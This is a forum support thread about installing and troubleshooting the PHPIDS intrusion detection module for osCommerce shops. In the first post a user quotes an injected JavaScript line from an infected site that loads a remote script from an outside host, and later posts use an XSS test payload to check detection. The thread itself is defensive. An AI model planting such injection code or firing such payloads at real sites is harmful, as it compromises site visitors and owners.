Jump to content
celextel

PHP Intrusion Detection System for osCommerce

Recommended Posts

Hello, I just found a virus on my site:

 

includes/general.js

line 192

document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>');

 

and so on, more than 20 files infected; the security mod will not prevent this.

 

PHPIDS does not protect you from intrusion or virus. It only warns you when an intrusion takes place. It would also not detect any virus on your system. You need to scan your website for virus with a Virus scanner provided by your host or another osCommerce module for detecting the virus.

 

Please leave your suggestion in regard to this [virus detection] in the PHPIDS forum at the following URL:

http://php-ids.org/forum/

Share this post


Link to post
Share on other sites

PHPIDS does not protect you from intrusion or virus. It only warns you when an intrusion takes place. It would also not detect any virus on your system. You need to scan your website for virus with a Virus scanner provided by your host or another osCommerce module for detecting the virus.

 

Please leave your suggestion in regard to this [virus detection] in the PHPIDS forum at the following URL:

http://php-ids.org/forum/

 

 

Yes, I mean I didn't get any warning message.. I have already open a thread on your forum.

Share this post


Link to post
Share on other sites

Yes, I mean I didn't get any warning message.. I have already open a thread on your forum.

 

You need to change your passwords to FTP and osCommerce Admin immediately. Someone seems to have got access to your files through FTP or osC Admin [if you have file manager there] and injected those codes. PHPIDS detects only those intrusions which take place through your website catalog URL through the query string. It would also not detect the virus codes which are already existing in the files.

Share this post


Link to post
Share on other sites

You need to change your passwords to FTP and osCommerce Admin immediately. Someone seems to have got access to your files through FTP or osC Admin [if you have file manager there] and injected those codes. PHPIDS detects only those intrusions which take place through your website catalog URL through the query string. It would also not detect the virus codes which are already existing in the files.

 

 

Thanks celextel for understanding; I have already put the site offline and changed the FTP password. We are cleaning all infected files but I need to find a solution, I'll contact you by PM.

Share this post


Link to post
Share on other sites

Hi, Is it possible for PHPIDS to push server usage over 20%. I only ask as my website got disable for a few minutes because of this. I also got an intrusion email....

 

The following attack has been detected by PHPIDS

 

 

Date: 2010-07-12T18:24:49-05:00

Impact: 10

Affected tags: xss csrf

Affected parameters: REQUEST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A, POST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A,

Request URI: %2Fcatalog%2Fbuilder_main.php%3Faction%3Dadd_products

Origin: 174.36.208.130

 

I was testing out a feature in my store and im not sure if there is an issue with the feature itself.

 

Thanks

Edited by pctekcomponents

Share this post


Link to post
Share on other sites

Hi, Is it possible for PHPIDS to push server usage over 20%. I only ask as my website got disable for a few minutes because of this. I also got an intrusion email....

 

The following attack has been detected by PHPIDS

Impact: 10

Affected tags: xss csrf

Affected parameters: REQUEST.image

POST.image

 

I was testing out a feature in my store and im not sure if there is an issue with the feature itself.

 

Thanks

 

We have been using PHPIDS in 5 of our websites and we have not noticed any push to server usage. This should be due to some other factor.

 

The reported intrusion seems to be of the feature which you were trying to test.

 

You could add these variables [REQUEST.image, POST.image] as Variable Exclusions

  1. if required.

Share this post


Link to post
Share on other sites

Thanks Celextel. It turns out that Custom Product Builder doesn;t appreciate " in any product descriptions.

 

Is there any info on interpreting PHPIDS results? Any time i get a detection i have no idea what i'm looking at.

For example i got this intrusion notification a little while ago....

 

IP: 109.224.137.123

Date: 2010-07-20T15:16:53-05:00

Impact: 66

Affected tags: xss csrf id rfe lfi

Affected parameters: REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D,

Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html

Origin: 174.36.208.130

 

I'm really not sure what any of the above means.

Share this post


Link to post
Share on other sites

Thanks Celextel. It turns out that Custom Product Builder doesn;t appreciate " in any product descriptions.

 

Is there any info on interpreting PHPIDS results? Any time i get a detection i have no idea what i'm looking at.

For example i got this intrusion notification a little while ago....

 

IP: 109.224.137.123

Date: 2010-07-20T15:16:53-05:00

Impact: 66

Affected tags: xss csrf id rfe lfi

Affected parameters: REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D,

Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html

Origin: 174.36.208.130

 

I'm really not sure what any of the above means.

 

Interpreting PHPIDS result is not easy. You could go through PHPIDS forum in regard to this.

 

This seems to be an attack. You could verify the IP and ban it.

Share this post


Link to post
Share on other sites

Hi,

 

I have tried to install phpids version 1.6 however the install file mentions files which are not in 1.6.

 

I went and got 1.4 and 1.5 and the files are not in there either.

 

All packages say the zip is a full package.

 

Can we have an install file that is relavent for 1.6 please as we would like to install it.

 

Thank you

 

oz :-)

Share this post


Link to post
Share on other sites

Hi,

 

I have tried to install phpids version 1.6 however the install file mentions files which are not in 1.6.

 

I went and got 1.4 and 1.5 and the files are not in there either.

 

All packages say the zip is a full package.

 

Can we have an install file that is relavent for 1.6 please as we would like to install it.

 

Thank you

 

oz :-)

 

You need to install the latest one. It has all the files.

 

Please let us know exactly as to which of the file is not in that package.

Share this post


Link to post
Share on other sites

Thank you for the reply.

 

These are the files in the latest package however the install files mentons other files.

 

Regards,

 

oz :-)

 

 

In /phpidsPHPIDS_for_oscommerce_1_6/ directory

 

Read_Me.htm

banned.php

GPL.txt

 

and these dirs..

 

/admin/

banned_ip.php

phpids_installer.php

phpids_report.php

 

/admin/includes/

 

/functions/

version_checker.php

 

/languages/

/english/

banned_ip.php

phpids_report.php

version_checker.php

 

/cache/

index.php

 

/includes/

/modules/

banned_ip.php

osc_phpids.php

Share this post


Link to post
Share on other sites

Thank you for the reply.

 

These are the files in the latest package however the install files mentons other files.

 

Regards,

 

oz :-)

 

 

In /phpidsPHPIDS_for_oscommerce_1_6/ directory

 

Read_Me.htm

banned.php

GPL.txt

 

and these dirs..

 

/admin/

banned_ip.php

phpids_installer.php

phpids_report.php

 

/admin/includes/

 

/functions/

version_checker.php

 

/languages/

/english/

banned_ip.php

phpids_report.php

version_checker.php

 

/cache/

index.php

 

/includes/

/modules/

banned_ip.php

osc_phpids.php

 

 

You need to Download "PHPIDS 0.6.4 (ZIP)" or the latest version at:

http://php-ids.org/downloads/

 

Please let us know exactly as to which of the files are missing other than this one.

Share this post


Link to post
Share on other sites

HI,

 

Okay I did get the files from the main PHPIDS site above and they are very different from what is at the osc addon contrib site.

 

Anyway, this 0.64 has the dirs ..

 

docs/ libs/ test/

 

Now before I install these should I delete everything I installed before..

 

eg the dirs and files I mention above and start anew?

 

Thanks

 

 

oz :-)

Share this post


Link to post
Share on other sites

HI,

 

Okay I did get the files from the main PHPIDS site above and they are very different from what is at the osc addon contrib site.

 

Anyway, this 0.64 has the dirs ..

 

docs/ libs/ test/

 

Now before I install these should I delete everything I installed before..

 

eg the dirs and files I mention above and start anew?

 

Thanks

 

 

oz :-)

 

You need to install both [core files from PHPIDS website and module files from the add-on section] as mentioned in our Read Me file. Please go through that file carefully and do the installation as mentioned therein.

Share this post


Link to post
Share on other sites

I hope to get this working soon. I downloaded 1.6, along with PHPIDS 0.6.4

 

The first phase of the install went perfectly -- got the tables creation confirmation, OSC admin panel has all appropriate Configuration and Tools entries. I left all settings completely default.

 

Then I uploaded the new and changed files for the catalog.

 

After I set "Show Intrusion Result" to true so that I could test the installation, I tried both intrusion examples.

 

Both times I got the following message:

 

Exception: 23000, 1048, Column 'origin' cannot be null

 

When I went to the admin panel to check the log -- no entries.

 

I've gone over the instructions to make sure I did everything correctly 4 times; CHMOD was done right when I uploaded - rechecked; checked my database - new tables are there.

 

Any suggestions would be immensely appreciated. I don't have any idea where to chase this.

Share this post


Link to post
Share on other sites

I hope to get this working soon. I downloaded 1.6, along with PHPIDS 0.6.4

 

After I set "Show Intrusion Result" to true so that I could test the installation, I tried both intrusion examples.

 

Both times I got the following message:

 

Exception: 23000, 1048, Column 'origin' cannot be null

 

"phpids_intrusions" db table has got a column by this name "origin" to record the server ip automatically. It is unable to perform this. You need to enable error handling and find out why this is not happening.

 

If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin.

Share this post


Link to post
Share on other sites
If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin.

 

My error handling is set to ALL. I reset the error log so that I can see specifically what today's problem is.

 

When I attempted the test URL's from the ReadMe, I was of course still getting the error previously mentioned, so I set origin to Null.

 

Now at the top of my page, I get:

------------------------------

Total impact: 8

Affected tags: xss, csrf

 

Variable: REQUEST.test | Value: \">XXX

Impact: 4 | Tags: xss, csrf

Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

 

Variable: GET.test | Value: \">XXX

Impact: 4 | Tags: xss, csrf

Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

 

 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102

------------------------------

followed by the rest of my page just like normal.

 

 

Still have NOTHING in the error log.

 

Thank you for helping me out with this. I really appreciate it.

Share this post


Link to post
Share on other sites

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102

 

We do not know as to why you were getting this error message.

 

You need to enable error logging into your hosting account. If you are unable to do this yourself, you have to request your hosting provider to do this.

Share this post


Link to post
Share on other sites

"phpids_intrusions" db table has got a column by this name "origin" to record the server ip automatically. It is unable to perform this. You need to enable error handling and find out why this is not happening.

 

If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin.

 

By going in through phpMyAdmin and manually changing the origin row to null as follows:

 

origin varchar(15) latin1_swedish_ci Yes NULL

 

I was able to get this to work.

 

However for the second test: ?test="><script>eval(window.name)</script>

 

When I run this I get

Forbidden

You don't have permission to access page_name.html on this server


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

>> Anti XSS [XSS Shield]

PHPIDS would not work fully if you use this as some of the query strings get sanitized.

You do not require this if you use Security Pro as both of them have almost same functions.

 

I want to make sure I follow the logic on this. With Anti XSS [XSS Shield]installed, that code would stop the intrusion and redirect to a 403 page, but also stop the code short of allowing PHPIDS to function, do I have that correct?

 

With Anti XSS [XSS Shield] removed, PHPIDS will then process an injection, do its job but in at least some cases, the script would still run in application_top.php and allow Security Pro to sanitize the string as well. Is that accurate?

 

Thanks much.


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

However for the second test: ?test="><script>eval(window.name)</script>

 

When I run this I get

Forbidden

You don't have permission to access page_name.html on this server

 

We do not have a file named as page_name.html in our module. You need to find our as to the module which is using this file. Perhaps some other contribution may be interfering with our contribution.

Share this post


Link to post
Share on other sites

I want to make sure I follow the logic on this. With Anti XSS [XSS Shield]installed, that code would stop the intrusion and redirect to a 403 page, but also stop the code short of allowing PHPIDS to function, do I have that correct?

 

With Anti XSS [XSS Shield] removed, PHPIDS will then process an injection, do its job but in at least some cases, the script would still run in application_top.php and allow Security Pro to sanitize the string as well. Is that accurate?

 

Thanks much.

You are correct.

 

PHPIDS creates a log about an intrusion when it occurs. Anti XSS codes do not allow this to happen. You could have Security Pro in lieu of Anti XSS.

Share this post


Link to post
Share on other sites

We do not have a file named as page_name.html in our module. You need to find our as to the module which is using this file. Perhaps some other contribution may be interfering with our contribution.

 

Since posting my observation I removed XSS [XSS Shield] and reran test 2. That error page I asked about disappeared on the second run; and the module functioned as it was supposed to. Thanks much.


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

You are correct.

 

PHPIDS creates a log about an intrusion when it occurs. Anti XSS codes do not allow this to happen. You could have Security Pro in lieu of Anti XSS.

 

Hello, with Anti XSS removed now from my system and Security Pro installed as per instructions in PHPIDS read me, all appears OK.

 

However I have noticed that when I am run Site Monitor, there are 18 files that keep recurring in the report even after I delete the Site Monitor reference file.

 

The recurring files are located in these directories:

 

includes/phpids/lib/IDS/tmp/

includes/phpids/lib/IDS/vendors/

 

I found I can get them to stop appearing in the Site Monitor report if I exclude them in the configure part of Site Monitor, but I thought I'd mention the situation for discussion sake. I am presuming there is something dynamic about these files that make them constantly change, perhaps that's how they work.

 

Thank for your assistance.


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

includes/phpids/lib/IDS/tmp/

includes/phpids/lib/IDS/vendors/

 

Yes, you have to add these directories in Site Monitor under exclusions. We are also using Site Monitor.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×